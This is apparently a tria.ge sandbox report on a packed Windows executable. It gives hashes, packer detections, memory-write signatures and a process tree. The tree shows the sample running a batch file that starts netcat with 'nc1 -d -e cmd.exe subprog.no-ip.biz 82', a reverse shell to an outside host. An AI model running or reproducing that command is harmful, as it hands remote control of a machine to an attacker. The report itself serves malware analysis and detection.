Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
20/07/2024, 08:45
Behavioral task
behavioral1
Sample
5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
Resource
win7-20240708-en
General
-
Target
5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
-
Size
1.3MB
-
MD5
5fce41613d2bb16e353e5546106568a0
-
SHA1
f8d76096e8cffe9ded2f1db2baf92e6a2d8edd02
-
SHA256
4443e16cbcd67066f1c66a9eba5ebf8091b371582a784b81c1fcf117b307473b
-
SHA512
ce18f167146c13a5a328b8caa5cc774eec6543f37054ff2da261dab4190766d45249aa0b3a5f35d9d0d0ac0002c89465cb93757aca94f17d40b59a11243a18a7
-
SSDEEP
24576:ttWcmES7iPyMHnz0iI85ZDuGX88PHKEHZyCyLyub8LlRHYt9N+KsTOrJZ:to797iKMHoi3PDXVPfHghyub8LL69NQ2
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2220 nc1.exe -
Loads dropped DLL 2 IoCs
pid Process 3060 cmd.exe 3060 cmd.exe -
resource yara_rule behavioral1/files/0x0008000000016d56-23.dat themida behavioral1/memory/2220-29-0x0000000000400000-0x0000000000518000-memory.dmp themida -
resource yara_rule behavioral1/memory/2068-0-0x0000000000400000-0x000000000057B000-memory.dmp upx behavioral1/memory/2068-34-0x0000000000400000-0x000000000057B000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2068 wrote to memory of 3060 2068 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe 30 PID 2068 wrote to memory of 3060 2068 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe 30 PID 2068 wrote to memory of 3060 2068 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe 30 PID 2068 wrote to memory of 3060 2068 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe 30 PID 3060 wrote to memory of 2220 3060 cmd.exe 32 PID 3060 wrote to memory of 2220 3060 cmd.exe 32 PID 3060 wrote to memory of 2220 3060 cmd.exe 32 PID 3060 wrote to memory of 2220 3060 cmd.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\C41A.tmp\moi.bat" C:\Users\Admin\AppData\Local\Temp\"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\C41A.tmp\nc1.exenc1 -d -e cmd.exe subprog.no-ip.biz 823⤵
- Executes dropped EXE
PID:2220
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
55B
MD5b10865d09b79c801d0ed79c38e1148b2
SHA1927d484b37376dcb0a8223f89f06923664f75d3d
SHA2567478f318af4b1dcb082609f0019ae994b58b8fc0e7ac2c278d9547c71c7fabf8
SHA51289c21f6aec91738a60e9a849e0b0ceca330dab365b2c36e1c62a84b940bfd6921bb19381d5acfad18e169f4dd1ba0d2a85d5f0bdea1e3e721535c76e3c437768
-
Filesize
1.1MB
MD5a5923f2e7efaf747844e530baa7fe32a
SHA1285559a6bf798ce6e9a49a1db2795d89e12675a7
SHA2569dfaaa97fa17a13a490f3892bd4b3cb7c4424ab3607dcc00c3ab88987b7d7e30
SHA512fc8e9589cf0dc8b86f4a8f79619d0844cb2651342e049630fe6e6a22dbde65151c0571ac521e8823e5c5aeb3219c7b780f928b146bb6c2d673674235bdaf542e